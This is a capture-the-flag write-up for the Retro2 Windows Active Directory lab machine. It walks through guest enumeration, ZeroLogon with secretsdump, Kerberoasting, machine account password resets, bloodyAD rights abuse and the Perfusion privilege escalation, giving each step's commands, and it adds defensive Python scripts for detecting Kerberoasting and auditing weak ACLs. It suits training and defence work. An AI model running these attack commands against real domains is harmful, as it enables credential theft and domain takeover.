# Machine (Easy) - Retro2

Writeup for the Retro2 machine, an easy-level Windows Active Directory box by xct. The attack chain involves enumeration via guest access, machine account manipulation, Kerberoasting, and abuse of AD object rights to reach Domain User access via RDP, followed by a token impersonation exploit for local privilege escalation.

Writeup Author: BobBuilder

Objective: Abuse machine account misconfigurations and AD object permissions to gain RDP access, then escalate to SYSTEM.
| Category | Difficulty | Platform | Machine Author |
|---|---|---|---|
| Machine | Easy | Windows | xct |
## User

### Enumerate AD Users via Guest Access

We start with lookupsid to enumerate users anonymously via the guest account:

```bash
impacket-lookupsid retro2.vl/guest:''@retro2.vl -no-pass | grep SidTypeUser | awk -F ' ' '{print $2}'
```

This reveals a long list of domain users and machine accounts.
### Machine Account Hash Capture with Responder

We capture the NTLMv2 hash of a machine account:

```text
# Responder output
BLN01$::RETRO2:<...>:<...>
```
### ZeroLogon Exploit for DCSync

Using ZeroLogon against the BLN01 system, then dumping with secretsdump:

```bash
python3 zerologon.py BLN01 <retro2_ip>
impacket-secretsdump -just-dc Bln01\$@<retro2_ip> -no-pass
```

This allows dumping the domain's secrets.
### Kerberoasting Machine Accounts

We request service tickets for the enumerated users (Kerberoasting), authenticating as guest, to find accounts with SPNs:

```bash
impacket-GetUserSPNs -target-domain retro2.vl -usersfile retro_users.txt retro2.vl/guest -no-pass
```

Cracked credentials:

```text
RETRO2\FS01$:<REDACTED>
RETRO2\FS02$:<REDACTED>
```
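The Kerberoasting step above leaves a recognisable trace on the domain controller: a burst of service ticket requests (Security event 4769) with RC4 encryption (type 0x17) from a single low-privileged account against many distinct service accounts. The following is an added detection example, not part of the original writeup; the event records are constructed to mirror the fields a SIEM exposes for 4769, and the account and host names (`alice`, `WEB01$`, the IPs) are made up.

```python
"""Flag Kerberoasting-style bursts of RC4 service ticket requests in Security event 4769 data.

Added detection example (not part of the original writeup). Input is a list of dicts
with the 4769 fields a SIEM typically exposes; the events below are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# RC4-HMAC encryption types: tools Kerberoasting from an unprivileged account usually
# request RC4 tickets so the hash is cheap to crack (AES-only accounts show 0x11/0x12).
RC4_ETYPES = {"0x17", "0x18"}

# Constructed sample of 4769 events: a burst from Guest against several machine-account
# SPNs, a TGT renewal that must be ignored, and ordinary requests from a user.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T10:00:01", "account": "guest@RETRO2.VL", "service": "FS01$", "etype": "0x17", "ip": "10.10.10.50"},
    {"time": "2024-05-01T10:00:02", "account": "guest@RETRO2.VL", "service": "FS02$", "etype": "0x17", "ip": "10.10.10.50"},
    {"time": "2024-05-01T10:00:02", "account": "guest@RETRO2.VL", "service": "WEB01$", "etype": "0x17", "ip": "10.10.10.50"},
    {"time": "2024-05-01T10:00:03", "account": "guest@RETRO2.VL", "service": "krbtgt", "etype": "0x17", "ip": "10.10.10.50"},
    {"time": "2024-05-01T10:03:00", "account": "alice@RETRO2.VL", "service": "BLN01$", "etype": "0x12", "ip": "10.10.10.21"},
    {"time": "2024-05-01T11:30:00", "account": "alice@RETRO2.VL", "service": "FS01$", "etype": "0x17", "ip": "10.10.10.21"},
]


def detect_kerberoasting(events, window=timedelta(minutes=5), min_services=3):
    """Return {requesting account: sorted service accounts} for every account that obtained
    RC4 service tickets for at least `min_services` distinct services within `window`."""
    requests = defaultdict(list)
    for ev in events:
        svc = ev["service"].lower()
        # krbtgt tickets are TGT renewals, not service tickets worth cracking
        if ev["etype"].lower() not in RC4_ETYPES or svc == "krbtgt":
            continue
        requests[ev["account"].lower()].append((datetime.fromisoformat(ev["time"]), svc))

    findings = {}
    for account, reqs in requests.items():
        reqs.sort()
        # slide a window over the time-ordered requests; one hit is enough to report
        for i, (start, _) in enumerate(reqs):
            in_window = {svc for ts, svc in reqs[i:] if ts - start <= window}
            if len(in_window) >= min_services:
                findings[account] = sorted(in_window)
                break
    return findings


if __name__ == "__main__":
    for account, services in detect_kerberoasting(SAMPLE_EVENTS).items():
        print(f"possible Kerberoasting by {account}: {', '.join(services)}")
```

The threshold and window are tuning knobs: a single RC4 request from a user is normal on domains that still allow RC4, while several distinct services inside a few minutes from a guest or otherwise low-activity account is the pattern to alert on. The durable fix is to disable the Guest account and give accounts with SPNs long, random passwords or convert them to gMSAs.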
### Change Machine Account Passwords

We change the passwords of the FS01 and FS02 machine accounts:

```bash
impacket-changepasswd 'retro2.vl/<REDACTED>':fs01@retro2.vl -newpass Password1 -dc-ip <retro2_ip> -p rpc-samr
impacket-changepasswd 'retro2.vl/<REDACTED>':fs02@retro2.vl -newpass Password1 -dc-ip <retro2_ip> -p rpc-samr
```
### Check for Certificate Template Misconfigs

```bash
certipy-ad find -vulnerable -u 'FS02$@BLN01.retro2.vl' -p 'Password1' -dc-ip <retro2_ip> -stdout
```

No vulnerable certificate templates found.
### SMB Spider to Discover Files

```bash
nxc smb retro2.vl -u 'RETRO2\guest' -p '' -M spider_plus -o DOWNLOAD_FLAG=True MAX_FILE_SIZE=1000000
```

This finds `staff.accdb`, a Microsoft Access database.
### Crack Encrypted Access DB File

```bash
office2john staff.accdb | tee officehash
# Hash saved to 'officehash'
```

Cracked password: <REDACTED>
### Extract LDAP Credentials from Access File

From the MS Access DB contents:

```text
retro2\ldapreader : <REDACTED>
```
### Time Sync for Kerberos

Kerberos rejected tickets due to clock skew, so we check the offset against the target:

```bash
ntpdate -q <retro2_ip>
# Offset found: -0.384988
```

We then use faketime to run tools with the adjusted system time.
### BloodHound Enumeration (Using ldapreader)

```bash
faketime -f -0.384988 bloodhound-python -c all -u "ldapreader" -p "<REDACTED>" -d retro2.vl -ns <retro2_ip>
```

Result: `FS01$` and `FS02$` (Domain Computers) have GenericWrite over the `ADMWS01` computer, which can be escalated to Remote Desktop Users via the `Services` group.
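The BloodHound finding above is exactly what a periodic ACL audit should surface before an attacker does: write rights over a computer object held by a group every domain member or machine belongs to, or by another machine account. The script below is an added example, not part of the original writeup or the BloodHound project. It reads a structure shaped like BloodHound's `computers.json` (`Aces` entries with `PrincipalSID`, `PrincipalType`, `RightName`) and reports dangerous rights held by low-privileged principals; the domain SID, object RIDs and the sample ACEs are constructed.

```python
"""Audit computer-object ACEs for write rights held by low-privileged principals.

Added example (not part of the original writeup). The input mimics the shape of
BloodHound's computers.json ("Aces" with PrincipalSID/PrincipalType/RightName); the
domain SID, object SIDs and ACEs below are constructed.
"""
import json

DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"  # constructed

# Principals that every domain member (or every machine) belongs to; write rights granted
# to them are reachable from any foothold, including a compromised machine account.
LOW_PRIV_PRINCIPALS = {
    "S-1-1-0": "Everyone",
    "S-1-5-11": "Authenticated Users",
    "S-1-5-32-545": "BUILTIN\\Users",
    f"{DOMAIN_SID}-513": "Domain Users",
    f"{DOMAIN_SID}-514": "Domain Guests",
    f"{DOMAIN_SID}-515": "Domain Computers",
}

# Rights that let the holder take over the target (reset its password, change owner/DACL,
# configure RBCD, add shadow credentials, or write arbitrary attributes).
DANGEROUS_RIGHTS = {
    "GenericAll", "GenericWrite", "WriteOwner", "WriteDacl", "Owns",
    "ForceChangePassword", "AllExtendedRights", "AddAllowedToAct",
    "AddKeyCredentialLink", "WriteAccountRestrictions",
}

# Names for non-well-known principals normally come from the other BloodHound JSON
# files; constructed here.
PRINCIPAL_NAMES = {f"{DOMAIN_SID}-512": "Domain Admins", f"{DOMAIN_SID}-1104": "FS02$"}

# Constructed computers.json excerpt: Domain Admins hold GenericAll (expected), Domain
# Computers hold GenericWrite over ADMWS01, and the machine account FS02$ holds WriteOwner.
SAMPLE_COMPUTERS_JSON = json.dumps({
    "data": [{
        "ObjectIdentifier": f"{DOMAIN_SID}-1105",
        "Properties": {"name": "ADMWS01.RETRO2.VL"},
        "Aces": [
            {"PrincipalSID": f"{DOMAIN_SID}-512", "PrincipalType": "Group", "RightName": "GenericAll", "IsInherited": False},
            {"PrincipalSID": f"{DOMAIN_SID}-515", "PrincipalType": "Group", "RightName": "GenericWrite", "IsInherited": False},
            {"PrincipalSID": f"{DOMAIN_SID}-1104", "PrincipalType": "Computer", "RightName": "WriteOwner", "IsInherited": False},
        ],
    }],
})


def audit_computer_aces(raw_json):
    """Return (principal, right, target) for every dangerous right held either by a
    low-privileged group or by another machine account (PrincipalType == "Computer")."""
    findings = []
    for computer in json.loads(raw_json)["data"]:
        target = computer["Properties"]["name"]
        for ace in computer.get("Aces", []):
            if ace["RightName"] not in DANGEROUS_RIGHTS:
                continue
            sid = ace["PrincipalSID"]
            if sid in LOW_PRIV_PRINCIPALS or ace.get("PrincipalType") == "Computer":
                name = LOW_PRIV_PRINCIPALS.get(sid) or PRINCIPAL_NAMES.get(sid, sid)
                findings.append((name, ace["RightName"], target))
    return findings


if __name__ == "__main__":
    for principal, right, target in audit_computer_aces(SAMPLE_COMPUTERS_JSON):
        print(f"{principal} has {right} over {target}")
```

Run it against a real collection and every line it prints is an edge from a low-privileged foothold to a computer takeover; the fix is to remove the ACE (or replace the broad group with the specific service account that needs it) and to keep machine account passwords rotating so a cracked Kerberoast hash does not become a persistent foothold.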
### Modify AD Objects via Machine Account Abuse

- Reset the password of `ADMWS01$`:

  ```bash
  faketime -f -0.384988 python3 bloodyAD.py -d retro2.vl -u 'FS02$' -p Password1 --host <admws01_ip> set password 'ADMWS01$' Password1
  ```

- Set `FS02$` as owner of `ADMWS01`:

  ```bash
  python3 bloodyAD.py -d retro2.vl -u 'FS02$' -p Password1 --host <admws01_ip> set owner ADMWS01 'FS02$'
  ```

- Add `ldapreader` to the `Services` group (which is a member of Remote Desktop Users):

  ```bash
  faketime -f -0.384988 python3 bloodyAD.py -d retro2.vl -u 'ADMWS01$' -p Password1 --host <admws01_ip> add groupMember "Services" 'ldapreader'
  ```
### RDP Access as ldapreader

```bash
rdesktop -u ldapreader -p '<REDACTED>' <admws01_ip> -d retro2.vl
```
## Root

### Privilege Escalation with Perfusion

We use Perfusion, a token impersonation exploit targeting the Performance registry keys of the RpcEptMapper or Dnscache services. It abuses Windows performance counters to gain SYSTEM privileges.

We proceed with the default key:

```cmd
Perfusion.exe -c cmd -i
```
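What makes Perfusion work is a registry ACL question: whether a low-privileged principal can create subkeys or set values under the service key. A defender can answer that from the key's SDDL string (on Windows, `(Get-Acl 'HKLM:\SYSTEM\CurrentControlSet\Services\RpcEptMapper').Sddl`). The parser below is an added example, not part of the original writeup or the Perfusion project: it decodes an SDDL DACL and flags allow-ACEs that grant write-capable registry rights to Everyone, Authenticated Users, Users or similar broad trustees. Both SDDL strings are constructed; the weak one is modelled on a service key that grants Authenticated Users create-subkey and set-value access, the hardened one reduces that entry to read.

```python
"""Parse the SDDL of a service registry key and flag write-capable ACEs for
low-privileged principals, the condition a performance-DLL escalation relies on.

Added defensive example (not part of the original writeup or the Perfusion project).
The SDDL strings are constructed; on a real host they come from Get-Acl on the key.
"""
import re

# SDDL access-right abbreviations with the bit each one sets in a registry access mask.
RIGHTS = {
    # object-specific bits, which for registry keys are the KEY_* rights
    "CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
    "DT": 0x40, "LO": 0x80, "CR": 0x100,
    # standard rights
    "SD": 0x10000, "RC": 0x20000, "WD": 0x40000, "WO": 0x80000,
    # generic rights
    "GA": 0x10000000, "GX": 0x20000000, "GW": 0x40000000, "GR": 0x80000000,
    # registry-key aliases
    "KA": 0xF003F, "KR": 0x20019, "KW": 0x20006, "KX": 0x20019,
}

# Bits that let a principal change the key: KEY_SET_VALUE (0x2), KEY_CREATE_SUB_KEY (0x4),
# WRITE_DAC, WRITE_OWNER, GENERIC_WRITE and GENERIC_ALL.
REG_WRITE_MASK = 0x2 | 0x4 | 0x40000 | 0x80000 | 0x40000000 | 0x10000000

# Trustees that any local or domain user (or machine) is a member of.
LOW_PRIV_TRUSTEES = {
    "WD": "Everyone", "AU": "Authenticated Users", "BU": "BUILTIN\\Users",
    "IU": "Interactive", "BG": "BUILTIN\\Guests", "DU": "Domain Users", "DC": "Domain Computers",
    "S-1-1-0": "Everyone", "S-1-5-11": "Authenticated Users", "S-1-5-32-545": "BUILTIN\\Users",
}

# Constructed: a key whose DACL grants Authenticated Users set-value/create-subkey rights
# (CCDCLCSWRPWPRC), and the same key with that entry reduced to read access.
WEAK_SDDL = "O:BAG:SYD:PAI(A;CI;KA;;;BA)(A;CI;KA;;;SY)(A;CI;KR;;;BU)(A;CI;CCDCLCSWRPWPRC;;;AU)"
HARDENED_SDDL = "O:BAG:SYD:PAI(A;CI;KA;;;BA)(A;CI;KA;;;SY)(A;CI;KR;;;BU)(A;CI;KR;;;AU)"


def parse_rights(rights):
    """Turn an SDDL rights field (two-letter codes or a hex literal) into an access mask."""
    if rights.startswith("0x"):
        return int(rights, 16)
    if len(rights) % 2:
        raise ValueError(f"malformed rights field: {rights!r}")
    mask = 0
    for i in range(0, len(rights), 2):
        code = rights[i:i + 2]
        if code not in RIGHTS:
            raise ValueError(f"unknown SDDL right {code!r}")
        mask |= RIGHTS[code]
    return mask


def dacl_aces(sddl):
    """Return the DACL's ACEs as field lists: type, flags, rights, object guid, inherit guid, trustee."""
    match = re.search(r"D:[A-Z]*((?:\([^()]*\))+)", sddl)
    if not match:
        return []
    return [ace.split(";") for ace in re.findall(r"\(([^()]*)\)", match.group(1))]


def weak_registry_aces(sddl):
    """Return (trustee name, hex mask) for every allow ACE that grants a low-privileged
    trustee a write-capable right on the key."""
    findings = []
    for ace in dacl_aces(sddl):
        ace_type, _flags, rights, _obj, _inherit, trustee = ace[:6]
        if ace_type != "A":
            continue  # deny and audit ACEs do not grant access
        mask = parse_rights(rights)
        if mask & REG_WRITE_MASK and trustee in LOW_PRIV_TRUSTEES:
            findings.append((LOW_PRIV_TRUSTEES[trustee], hex(mask)))
    return findings


if __name__ == "__main__":
    print("weak:", weak_registry_aces(WEAK_SDDL))
    print("hardened:", weak_registry_aces(HARDENED_SDDL))
```

Any finding on a key under `HKLM\SYSTEM\CurrentControlSet\Services` is worth fixing by removing the write bits from the broad trustee, and worth monitoring: creation of a `Performance` subkey or a `Library` value under a service key by a non-administrative user is a high-signal event for this class of escalation.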